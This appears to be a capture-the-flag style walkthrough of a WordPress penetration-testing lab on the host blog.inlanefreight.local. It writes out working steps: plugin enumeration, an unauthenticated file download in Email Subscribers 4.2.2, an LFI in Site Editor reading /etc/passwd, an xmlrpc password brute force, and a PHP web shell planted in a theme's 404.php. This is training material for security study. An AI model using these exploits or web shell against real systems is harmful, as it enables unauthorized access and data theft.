Question 1
Task: Identify the WordPress version number.
Since I couldn’t connect to the blog right away because multiple domains share the same IP, I added a virtual:
sudo cp /etc/hosts /etc/hosts.bak
sudo bash -c 'echo "10.129.2.37 blog.inlanefreight.local" >> /etc/hosts'
Before appending data I always take a backup because if you accidentally use > instead of » it will rewrite the entire file. You can of course use a text editor too.
Upon examining the source code, I found the version was 5.1.6.
Or you could run this:
curl -s -X GET 'http://blog.inlanefreight.local' | grep '<meta name="generator"'
Question 2
Task: Identify the WordPress theme in use.
You can directly examine the source code but it was hard to pick up the info, I ran this command:
curl -s -X GET http://blog.inlanefreight.local | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/themes/*' | cut -d"'" -f2
I found the theme twentynineteen.
Question 3
Task: Submit the contents of the flag file in the directory with directory listing enabled.
Tried directory indexing to the theme I found:
curl -X GET http://blog.inlanefreight.local/wp-content/themes/twentynineteen -L | html2text
but it didn’t show anything.
So I enumerated plugins:
curl -s -X GET http://blog.inlanefreight.local | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2
Output:
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/common/src/resources/css/common-skeleton.min.css?ver=4.12.3
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/common/src/resources/css/tooltip.min.css?ver=4.12.3
http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/public/css/email-subscribers-public.css
http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/icon-library/fonts/FontAwesome/FontAwesome.css?ver=4.3
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/css/general.min.css?ver=1.1.1
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/css/animate/animate.min.css?ver=5.1.6
http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/public/js/email-subscribers-public.js
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/js/sed_app_site.min.js?ver=1.0.0
http://blog.inlanefreight.local/wp-content/plugins/site-editor/assets/js/livequery/jquery.livequery.min.js?ver=1.0.0
http://blog.inlanefreight.local/wp-content/plugins/site-editor/assets/js/livequery/sed.livequery.min.js?ver=1.0.0
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/js/animate/wow.min.js?ver=1.0.2
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/js/parallax/jquery.parallax.min.js?ver=1.1.3
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/js/render.min.js?ver=1.0.0
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/common/src/resources/js/underscore-before.js
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/common/src/resources/js/underscore-after.js
http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/modules/row/js/row.js?ver=1.0.0
Targeted the plugin ‘email-subscribers’:
curl -s -X GET http://blog.inlanefreight.local/wp-content/plugins/email-subscribers -L | html2text
This gave me a list of directories but I couldn’t find flag.txt there.
Since manual enumeration is time-consuming, I used wpscan:
wpscan --url http://blog.inlanefreight.local -e vp --no-banner
I found directory indexing is enabled on http://blog.inlanefreight.local/wp-content/uploads/ and ran:
curl -s -X GET http://blog.inlanefreight.local/wp-content/uploads/ -L | html2text
and found the flag.
Question 4
Task: Identify the only non-admin WordPress user.
wpscan:
wpscan --url http://blog.inlanefreight.local -e u
Found two non-admin users, erika and Charlie Wiggins. The output doesn’t indicate if erika is an admin or not, but you can assume Charlie Wiggins is the correct flag as the answer format specifies a full name.
Question 5
Task: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
You could run this wpscan but it’ll take long:
wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 50
Since I already listed plugins in Question 3 and confirmed directory indexing is enabled on email-subscribers/, I directly accessed http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/readme.txt and found out its version is 4.2.2.
Search for vulnerabilities:
searchsploit email subscribers 4.2.2
Found an unauthenticated file download vulnerability:
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download | php/webapps/48698.txt
Download the file and inspect it:
searchsploit -m php/webapps/48698.txt
Run the command as explained:
curl 'http://blog.inlanefreight.local/wp-admin/admin.php?page=download_report&report=users&status=all'
Found the flag.
Question 6
Task: What is the version number of the plugin vulnerable to an LFI?
From the output of the plugin enumeration in Question 3, there are two other plugins, site editor and the events calendar. By accessing http://blog.inlanefreight.local/wp-content/plugins/site-editor/readme.txt you’ll know the version of site editor is 1.1.1 (Search for stable tag). Exploit-db shows it has LFI vulnerability.
Question 7
Task: Use the LFI to identify a system user whose name starts with the letter “f”.
Exploit:
curl -s http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd | grep f
I found frank.mclane:x:1002:1002::/home/frank.mclane:/bin/bash.
Question 8
Task: Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
Crack erika’s password:
wpscan --password-attack xmlrpc -t 50 -U erika -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local --no-banner --no-update
Even though the WP version is 5.1.6 and supports REST, it doesn’t disable xmlrpc in this case.
Log in as erika and insert a web shell code to a php file:
system($_GET['cmd']);
Found a flag in blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=cat%20/home/erika/d0ecaeee3a61e7dd23e0e5e4a67d603c_flag.txt.